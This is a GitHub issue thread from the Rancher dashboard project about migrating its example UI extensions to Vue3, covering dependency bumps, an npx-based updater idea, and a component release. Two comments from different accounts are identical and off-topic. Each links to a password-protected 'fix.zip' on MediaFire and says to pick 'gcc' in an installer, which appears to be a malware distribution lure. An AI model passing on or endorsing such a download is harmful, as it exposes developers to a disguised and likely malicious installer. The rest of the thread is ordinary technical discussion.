### ISSUE TITLE
Update configuration for migration of example extensions to Vue3

### ISSUE THREAD

**Issue by cnotv** [rancher/dashboard#11706]
# Description

Our owned extensions/plugin require to be updated to a Vue3 compatible syntax and dependencies.
https://github.com/rancher/ui-plugin-examples

## Considerations

Extensions are structured with an external package which will install shell and an internal library containing the extension.
In the case of the examples, multiples are provided.

Rancher libraries will require to be bumped on NPM in order to be used:
- `@rancher/dashboard`
- [x] #11710

`@vue/cli-service` needs to be bumped also as requirement in order to work.

This issue may be related to https://github.com/rancher/dashboard/issues/11694

## Implementations

- https://github.com/rancher/dashboard/pull/11863

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cnotv** [comment]
While I was trying to evaluate how to update the root of the extension, as it requires to be updated as well, I would rather recommend the use of a separated repository for this purpose to be executed with `npx`.
E.g.: `npx @rancher/extension-update`

**Comment by rak-phillip** [comment]
A new version of `@rancher/components` has been published: https://www.npmjs.com/package/@rancher/components/v/0.3.0-alpha.1
